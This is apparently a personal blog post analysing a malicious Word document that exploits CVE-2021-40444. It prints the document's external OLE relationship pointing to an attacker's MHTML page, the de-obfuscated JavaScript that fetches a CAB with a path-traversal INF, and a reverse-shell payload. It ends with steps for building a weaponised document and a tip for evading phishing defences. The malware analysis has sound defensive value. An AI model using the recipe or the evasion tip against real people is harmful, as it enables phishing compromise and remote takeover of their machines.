CVE-2021-40444 Analysis/Exploit

 · 11 mins read

Intro

I’m writing the blog post when I have no technical background on this exploit. So I would like to share my experience with it. I saw a lot of people did a proof of concept, so I decided to do something different which is I will get the exploit then I will analyze more and go deep into it, and if you noticed any mistake in my blogpost be DM me on my Twitter account.

I hope I can do something useful, enjoy reading.

Test Environment

Here is my test environment lab listed below:

  1. Windows System
    1. Process Monitor
    2. Microsoft Office
    3. python3
    4. vscode

Process Monitor will help us to figure out what is happens when we open the affected word document.

Python3 will help us to start a SimpleHTTPServer, feel free to use whatever you want.

After setup the environment. I will download the exploit sample from https://github.com/rfcxv/CVE-2021-40444-POC

Thanks so much, @rfcxv and @JAMESWT_MHT for uploading the samples.

After Downloading the samples, I renamed the file’s name.

image-20210911061213972

Dynamic Analyzes

I would like to start with dynamic analyzes to figure out what is happens behind the scenes. So I will start the process monitor then CTRL+E and CTRL+X to stop capturing the events and clear the events.

Then I will set up a filter to capture the only Microsoft Word events by pressing CTRL+L then I will set WINWORD.exe in the filter then apply the changes.

image-20210911062805054

Then let’s capture our word events by pressing CTRL+E again then open the word document.

Static Analyzes

Word Document

Here I will do some Static analyzes. So I would like to start from the doc file. So let’s unpack the document

By changing the file extension to .zip then extract the file data.

image-20210911072210854

Then when I went to check the file I noticed two weird URLs in the relationship file.

image-20210911074246672

Relationship file

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
	<Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" />
	<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" />
	<Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" />
	<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" />
	<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" />
	<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" TargetMode="External" />
	<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf" />
	<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg" />
</Relationships>

Relationship files is the normal behavior should to contains internal/External resources such as (font, theme, and web settings, etc.)

I found two external URLs refers to hidusi.com domain.

MHTML is a file extension for a Web page archive file format as saved by Internet Explorer. The archived Web page is an MHTML document. MHTML saves the Web page content and incorporates external resources, such as images, applets, Flash animations and so on, into HTML documents.

So I decided to add that domain name in my hosts file and establish an HTTP server through python.

image-20210911075233399

image-20210911075304692

Now let’s see what will happen when I open the document again.

image-20210911075345459

Okay, it goes to get the content of the side.html as I found in the relationship file. There is an ID for each relationship so I can take the ID of that relationship and search in the document.xml file to find more details on it.

image-20210911095308848

And yeah I found OLEObject for that ID as expected.

Word OLE (Object Linking and Embedding) object is used to make contents, created in one program, available in Word document. For example, users can insert an Excel worksheet in a Word document.

Both Linked object and Embedded object can be used between Word and other programs.

CAB file

When I took a look into the cab file through WinRAR I noticed an inf binary inside it and it looks like there is an LFI vulnerability because there is ..\ before the file name, but okay we’ll go deep in that later so now let’s find out what is the inf binary does.

I’ll use the file command but as we know that command is on Linux and I do not have bash or Linux subsystem on my machine but thanks so much @nscaife for this awesome work https://github.com/nscaife/file-windows/releases

image-20210911114131808

After taking a look into that cab file in IDA I found the below:

  1. It creates a VirtualAlloc and CreateThread to return a reverse shell to the attacker.

image-20210911115854255 createthread

HTML File

So my next step will be analysis that HTML file.

I found JS in the HTML but sadly it was obfuscated.

image-20210911075828285

So I will dig more to figure out what is the goal of that JS. to do that mission I will need to do some dynamic debugging and again I can do this through vscode and I’ll select Edge for debugging because the HTML supports IE11.

JavaScript Dynamic Debugging

When I look at the first array I noticed some things looks like it tries to send a GET request to fitch the cab file, but yeah let’s go deep.

image-20210911091543134

I will set a breakpoint at this point

image-20210911101450946

because I noticed it does some push and shift for the first array so I decided to discover more about it.

So all I’ll do is to set a breakpoint at this line then run my debugger on Edge. Then I will keep my eye on the array.

image-20210911101911172

and yeah as expected it takes the first value in the array and pushes it again into it. So now if you noticed there is an if condition before modifies the array, I think this condition just to stop that push on a specific value, so I’ll change my breakpoint to the break function to check the array after that modification.

image-20210911102741585

Fine, now our new array is

['#version=5,0,0,0', 'ssi', 'iframe', '748708rfmUTk', 'documentElement', 'lFile', 'location', '159708hBVRtu', 'a/Lo', 'Script', 'document', 'call', 'contentWindow', 'emp', 'Document', 'Obj', 'prototype', 'lfi', 'bject', 'send', 'appendChild', 'Low/championship.inf', 'htmlfile', '115924pLbIpw', 'GET', 'p/championship.inf', '1109sMoXXX', './../A', 'htm', 'l/T', 'cal/', '1wzQpCO', 'ect', 'w/championship.inf', '522415dmiRUA', 'http://127.0.0.1/test.cab', '88320wWglcB', 'XMLHttpRequest', 'championship.inf', 'Act', 'D:edbc374c-5730-432a-b5b8-de94f0b57217', 'open', '<bo', 'HTMLElement', '/..', 'veXO', '102FePAWC', '123', '365952KMsRQT', 'tiveX', '/Lo', './../../', 'contentDocument', 'ppD', 'Dat', 'close', 'Acti', 'removeChild', 'mlF', 'write', './A', 'ata/', 'ile', '../', 'body', 'setAttribute']

and if you want to count how many times it goes to else, simply you can make a flag variable with 0 value and add 1 when it goes into else and log it before the break.

image-20210911103716067

and if you did that. you can find the count easily in the console section

image-20210911103812268

Then I decided to take a fast look at all the variables, so basically I typed var in the search then I found 15 variables - 1 variable for our flag = 14 variables, so It didn’t take much time to notice the following:

  1. There are 3 variables with only one letter (_0x371a71, _0xd7e33d, _0x487bfa).
  2. There are some variables concat from the array and another variables.

So, now I decided to create a script that takes the obfuscate file then replaces these variables with them values, wait what!!!?

I’m too lazy right now, so I won’t do that now :joy:

All I will do is replace it with myself.

Dynamic Analyzes again

So now we know that HTML file will go and download the cab file.

Now I’ll create a folder called e8c76295a5f9acb7 with side.html in it to let the word documents open the HTML and execute the JavaScript. and as we know the JavaScript will do a GET request to e8c76295a5f9acb7/ministry.cab to get that cab file, so let’s also move the cab file into our folder.

image-20210911112042427

image-20210911112054473

Then let’s start our python HTTP server and see what will happen.

image-20210911112243649

At the current moment, I do not know How is this file used?

So to get this answer let’s capture the word event and see what is happens in the background.

Here I’ll filter the inf binary to get where its use.

image-20210911121638683

and yeah I found it running through rundll32.exe

WHAT WAIT A MINUTE !!!!!!!!!!!!

image-20210911122043169

via GIPHY

tbh idk why sometimes rundll32.exe can not find the championship.inf while if you went to the path you will find it :(

As we see rundll32.exe tries to run the inf file from many paths which is ordered in the JavaScript

If we take a close look into any event of these we will found the full command line.

image-20210911122520601

and if we went to C:\Users\PwnLab\AppData\Local\Temp that path we will found

image-20210911123151040

Exploit Setup

I lost my power after all of I did and I want to publish this blogpost before go to sleep so I will do a few step on how to create your own malicious document.

  1. Download Office.
  2. Create a normal word document.
  3. Add Bitmap Image.
  4. unpack the document.
  5. modify the document.xml.rels, to add your external relationship.
  6. modify the document.xml, to add OLEObject with the same relationship ID.
  7. pack the document again.
  8. Create your own dll.
  9. Convert the dll to cab.
  10. Modify the HTML file to add your cab locations and inf file.

Note for Red Teamer

If you are planning to use this CVE in your phishing engagement take care because many solutions are checking the Relationship files and if it found any kind of external relationship, it will take that URL and open it to check if it has malicious data or not. So watch out :)


If you have feedback please go ahead and DM me on Twitter, See you in the next blogpost.

Buy Me A Coffee